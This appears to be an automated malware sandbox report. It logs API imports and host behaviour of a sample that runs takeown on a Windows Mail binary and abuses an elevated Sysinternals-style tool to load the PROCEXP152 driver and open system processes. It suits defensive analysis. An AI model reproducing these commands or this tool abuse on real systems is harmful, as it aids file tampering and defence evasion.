| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75efeb30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x75ea4610 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x75ea4a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75efeed0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75ea5490 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x75efed40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x75ea6520 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77c0a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75ea5a60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x75ea53b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x75ea6800 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x75ea5cc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x75ea56c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75efed10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75ea4aa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75ea6740 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75efeab0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75ea4f00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x75ea5b00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75ea5010 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75efea10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75ea5bc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x75ea4cc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75ea50d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x75ea5ae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x75ea5330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x75ea5b40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75ea5b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75ea51b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75ea5090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x75eff5a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75efef60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x75ea5d10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x75eff4c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75eff500 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75eff130 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77bfb2d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77bfb250 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x75ea6620 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77bf2dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77c129e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77c11ec0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x75ea3cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75ea5110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75ea5c40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x75ea6b10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x75ea57f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75eff450 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x75eff4a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75eff4e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75ea46b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75ea8820 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77c16390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75ea5ac0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77bdfb90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x75efee70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75eff180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75eff440 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75ea5960 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x75eff090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x75ea5320 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x75ea68d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x75ea6720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75efebb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x75ea6760 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x75ea67e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75ea6820 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75ea6850 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75ea6870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75ea6830 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x75ea59c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75ea4ca0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x75ea5160 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75ea4d10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75ea51f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75ea7c10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75ea5da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75efea20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75ea5530 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x75ea4eb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x75ea4c20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77bef630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x75eff0e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x761cee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x761cf910 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x761c8c80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x761cffa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x761cefb0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x761cf530 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x761ce5a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x761ce580 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x761cf460 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x761cf9b0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x761ced60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x761cf100 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x75106b00 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x75b747e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x75b74f70 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x75b74ef0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x75b73c10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x75b75c60 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x75b74810 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x74b807d0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x74b8e6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x74b79080 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x74b9ab40 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x74b83570 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x74ba09b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x74ba2bec |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x74b7d0c0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x74b793b0 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x744a1590 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x744a1510 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x744a1570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x75ea4ae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x75ea4b00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75ea4b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75ea4b40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75efebc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75efeb20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75efeb80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x75ea6700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x75ea6d30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77bfd7c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77bfb840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77bfb740 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75ea6d70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77bfc0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77bfbe10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77c22b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77c18e50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77c152f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x75ea71b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x75ea4510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x7500d900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x75ea49a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x75ea7050 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x75ea7760 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x75ea7190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x75ea7780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x75ea72c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x75ea7440 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75ea7480 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f9e260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75ea0db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x75ea5a20 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-22 14:10:10 (UTC) |
|
1 | |
| Get Time | type = Performance Ctr, time = 20037034110 |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #36: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #36 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Mail\wab.exe" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:02:19, Reason: Child Process |
| Unmonitor | End Time: 00:02:20, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xed0 |
| Parent PID | 0x13cc (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
FF0
0x
105C
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00870000 | 0x00880FFF | Process Termination | - | 32-bit | - |
|
|
|
Process #37: mxkefu6a64.exe
2520
0
| Information | Value |
|---|---|
| ID | #37 |
| File Name | c:\users\fd1hvy\appdata\local\temp\mxkefu6a64.exe |
| Command Line | mxkeFu6a.exe -accepteula "SmsInterceptStore.db" -nobanner |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:02:21, Reason: Child Process |
| Unmonitor | End Time: 00:02:54, Reason: Self Terminated |
| Monitor Duration | 00:00:32 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x106c |
| Parent PID | 0x1378 (c:\users\fd1hvy\desktop\mxkefu6a.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1060
0x
F74
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| mxkefu6a64.exe | 0x140000000 | 0x140045FFF | Process Termination | - | 64-bit | - |
|
|
|
Host Behavior
File (16)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | \\.\PROCEXP152 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \\.\Global\PROCEXP152 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\WINDOWS\system32\Drivers\PROCEXP152.SYS | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \\.\PROCEXP152 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\WINDOWS\system32\Drivers\PROCEXP152.SYS | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
2 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | C:\WINDOWS\system32\Drivers\PROCEXP152.SYS | size = 32768 |
|
1 | |
| Write | C:\WINDOWS\system32\Drivers\PROCEXP152.SYS | size = 1560 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 29 |
|
1 | |
| Delete | C:\WINDOWS\system32\Drivers\PROCEXP152.SYS | - |
|
1 |
Registry (13)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Create Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PROCEXP152 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PROCEXP152 | value_name = Type, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PROCEXP152 | value_name = ErrorControl, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PROCEXP152 | value_name = Start, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PROCEXP152 | value_name = ImagePath, data = \??\C:\WINDOWS\system32\Drivers\PROCEXP152.SYS, size = 92, type = REG_SZ |
|
1 | |
| Delete Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PROCEXP152\Enum | - |
|
1 | |
| Delete Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PROCEXP152\Security | - |
|
1 | |
| Delete Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PROCEXP152 | - |
|
1 |
Process (123)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | c:\windows\system32\conhost.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_DUP_HANDLE |
|
8 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_DUP_HANDLE |
|
9 | |
| Open | c:\windows\system32\wbem\wmiprvse.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_DUP_HANDLE |
|
2 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | System | desired_access = PROCESS_DUP_HANDLE |
|
5 | |
| Open | System | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\smss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wininit.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\winlogon.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\services.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsass.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\fontdrvhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\fontdrvhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\audiodg.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\microsoft shared\clicktorun\officeclicktorun.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\securityhealthservice.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wbem\wmiprvse.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\devicecensus.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\apphostregistrationverifier.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows mail\entering.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\reference assemblies\anne measurement nut.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\marilyn_becoming_editors.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
